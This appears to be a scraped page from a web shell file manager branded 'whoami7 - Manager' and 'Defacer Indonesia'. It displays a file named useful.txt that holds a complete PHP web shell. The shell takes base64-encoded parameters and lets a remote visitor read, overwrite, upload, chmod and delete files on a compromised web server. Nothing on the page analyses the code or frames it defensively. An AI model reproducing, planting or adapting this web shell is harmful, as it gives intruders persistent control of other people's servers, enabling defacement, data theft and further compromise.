whoami7 - Manager
:
/
proc
/
thread-self
/
root
/
tmp
/
Upload File:
files >> //proc/thread-self/root/tmp/useful.txt
<?='<hr>';if(1){$a=realpath($_SERVER['DOCUMENT_ROOT']);function x($b){return base64_encode($b);}function y($b){return base64_decode($b);}foreach($_GET as $c=>$d)$_GET[$c]=y($d);if(isset($_GET['d'],$_GET['f'])&&!is_dir($_GET['d'].'/'.$_GET['f'])){if(isset($_POST['t']))echo 'FILE '.(file_put_contents($_GET['d'].'/'.$_POST['f'],$_POST['t'])?'done':'failed').' updating.';echo $_GET['f'].'<form method=post action="?'.$_SERVER['QUERY_STRING'].'"><input name="f" value="'.$_GET['f'].'"><textarea name="t">'.htmlspecialchars(preg_replace('/[^(\x00-\x7f)]/','',(file_get_contents($_GET['d'].'/'.$_GET['f'])))).'</textarea><input type=submit value=update></form>';}if(isset($_GET['d'],$_GET['f'],$_GET['c']))echo 'CHMOD '.(chmod($_GET['d'].'/'.$_GET['f'],octdec($_GET['c']))?'done':'failed');if(isset($_GET['d'],$_FILES['u']))echo 'UPLOAD '.(move_uploaded_file($_FILES['u']['tmp_name'],$_GET['d'].'/'.basename($_FILES['u']['name']))?'done':'failed');if(isset($_GET['d'],$_GET['x']))echo 'DELETE '.(unlink($_GET['d'].'/'.$_GET['x'])?'done':'failed');$e=realpath(isset($_GET['d'])?$_GET['d']:$a);chdir($e);echo '<hr>docroot: <a href="?d='.x($a).'">'.$a.'</a><hr>curdir: '.$e.'<form method="post" action="#" enctype="multipart/form-data"><input type="file" name="u"><input type="submit" value="UpL0ad"></form><table border=1>';foreach(scandir($e) as $v){$u=realpath($v);$s=stat($u);echo '<tr><td>'.($s['mode']>=0x8000?'<a href="?d='.x($e).'&x='.x($v).'">X</a>':'').'</td><td><a href="?'.($s['mode']>=0x8000?'d='.x($e).'&f='.x($v):'d='.x($u)).'"/>'.$v.'</a></td><td><input type="button" onclick="c=prompt(`chmod:`,this.value),c?location.href=`?d='.x($e).'&f='.x($v).'&c=`+btoa(c):0" value="'.substr(sprintf('%o',$s['mode']),-4).'"></td><td>'.$s['size'].'</td></tr>';}echo '</table>';}?>
Copyright ©2021 || Defacer Indonesia